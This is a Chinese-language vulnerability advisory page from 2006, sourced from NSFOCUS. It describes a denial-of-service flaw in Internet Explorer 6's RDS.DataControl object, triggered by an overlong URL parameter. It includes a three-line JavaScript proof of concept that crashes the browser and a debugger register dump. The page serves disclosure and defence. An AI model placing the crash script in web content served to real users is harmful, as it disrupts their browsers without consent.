⊙　在线帮助 ⊙　添加收藏 ⊙　网站地图 最新资讯 技术中心 下载园地 漏洞总汇 在线书籍 X-档案 法规标准 技术论坛  您现在的位置 >> 首页 >> 漏洞总汇 >> 常用软件 >> browser

Microsoft IE6 RDS.DataControl处理URL参数拒绝服务漏洞 【责 编】：AcOol 【作 者】：不详 【添 加】：2006-7-10 【更 新】：2006-7-10 【出 处】：绿盟科技 【字 体】：[ 小 大 ] 【浏 览】： 受影响系统： Microsoft Internet Explorer 6.0 SP2 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 描述： BUGTRAQ  ID: 18900 Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。 Internet Explorer的RDS.DataControl对象在处理JavaScript中的URL参数时存在漏洞，远程攻击者可能利用此漏洞导致IE崩溃。 Internet Explorer的RDS.DataControl对象使用OLE32.dll中的SysAllocStringLen例程拷贝JavaScript的URL参数。在Windows 2000上，这可能导致无效的长度计算，读取页面以外的内存。在访问破坏之前可能会出现某种形式的堆破坏，但由于堆中没有SEH指针，因此很难利用。 <*来源：H D Moore （hdm@metasploit.com）      链接：http://browserfun.blogspot.com/2006/07/mobb-8-rdsdatacontrol-url.html *> 测试： var a = new ActiveXObject('RDS.DataControl'); var b = "X"; while (b.length < (1024*256)) a.URL = (b+=b); Demonstration eax=001be00c ebx=00005a70 ecx=00000231 edx=00005a70 esi=00191000 edi=001c31b8 eip=779d927a esp=0012b1b4 ebp=7c59c147 OLEAUT32!SysAllocStringLen+0x7a: 779d927a f3a5 rep movsd ds:00191000=???????? es:001c31b8=00580058 建议： 厂商补丁： Microsoft --------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.microsoft.com/windows/ie/default.asp ·本站特别声明不要转载或作者授权本站独家播发的文章，请勿转载。 ·本站原创文章可自由转载，但本站作者及本站链接必须保留。 ·非本站原创文章可自由转载，请按作者及文章出处一节，自行链接。 ·转载之图片、文件，链接请不要盗链到本站，且不准打上各自站点的水印，亦不能抹去我站点水印。

+ 本站推荐 + ·Microsoft IE6 RDS.DataContro ·Linux Kernel PRCTL Core Dump ·Microsoft Word mso.dll LsCre ·Mambo多个远程文件包含漏洞 ·SIPfoundry SIPXtapi CSeq处理 + 相关漏洞 + ·Microsoft IE StructuredGraph ·Microsoft Internet Explorer ·Microsoft Internet Explorer ·Microsoft Internet Explorer信 ·Opera Web浏览器JPEG图像处理远 + 热点漏洞 + ·Microsoft Windows Media Play ·Microsoft IE JavaScript OnLo ·RARLAB WinRAR命令行处理溢出漏 ·动网论坛(DVBBS 7.1.0 SP1)Sav ·McAfee VirusScan路径指定权限 + 本站发布 +

关于站点 | 免责申明 | 版权隐私 | 业务合作 | 提供捐助 | 联系我们 Copyright © 2001-2005 CoolerSky. All Rights Reserved.